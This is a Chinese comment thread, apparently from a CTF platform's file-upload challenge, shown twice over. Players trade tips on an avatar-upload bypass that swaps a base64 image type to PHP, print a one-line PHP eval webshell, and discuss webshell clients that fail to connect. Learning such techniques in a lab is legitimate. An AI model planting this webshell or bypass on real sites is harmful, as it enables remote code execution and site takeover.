好奇怪的题但是还是做出来了
高版本php好像可以防止菜刀连接,木马用REQUEST的能够直接在url上操作,一句话设置的密码参数不要加''号,不然会报错。
尝试了好多次,总是连不上(显示为空),换同学的号,一样的操作后,成了(惊喜),转回自己的号再来一遍,顺利。郁闷之前咋就不行呢?!
人麻了,菜刀死活连不上
https://blog.csdn.net/m0_61011147/article/details/122963125
注入点在上传头像那 发布二货那里也可以上传图片,不过是不是注入点我没试
三个蚁剑冰鞋菜刀都连不上 真是邪了门了 浪费金币 淦
@boob 一句话木马都长一个样啊
@boob 我第一次尝试的时候转码后最后一位是个”+“,就出问题了。
@狐萝卜CarroT 你的一句话木马可以看发一下看看吗
可能是上传的一句话木马的问题
注意有些评论的字符被bugku过滤替换掉了
用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php
...
评论
W3nt0Ddy 2年前
举报
好奇怪的题但是还是做出来了
ZZOok 2年前
举报
高版本php好像可以防止菜刀连接,木马用REQUEST的能够直接在url上操作,一句话设置的密码参数不要加''号,不然会报错。
xiaobaidectf 2年前
举报
尝试了好多次,总是连不上(显示为空),换同学的号,一样的操作后,成了(惊喜),转回自己的号再来一遍,顺利。郁闷之前咋就不行呢?!
ALLBUG 2年前
举报
人麻了,菜刀死活连不上
不会打CTF的向南 2年前
举报
https://blog.csdn.net/m0_61011147/article/details/122963125
狐萝卜CarroT 2年前
举报
注入点在上传头像那 发布二货那里也可以上传图片,不过是不是注入点我没试
boob 2年前
举报
三个蚁剑冰鞋菜刀都连不上 真是邪了门了 浪费金币 淦
狐萝卜CarroT 2年前
举报
@boob 一句话木马都长一个样啊
狐萝卜CarroT 2年前
举报
@boob 我第一次尝试的时候转码后最后一位是个”+“,就出问题了。
boob 2年前
举报
@狐萝卜CarroT 你的一句话木马可以看发一下看看吗
狐萝卜CarroT 2年前
举报
可能是上传的一句话木马的问题
study123 2年前
举报
注意有些评论的字符被bugku过滤替换掉了
study123 2年前
举报
用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
study123 2年前
举报
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php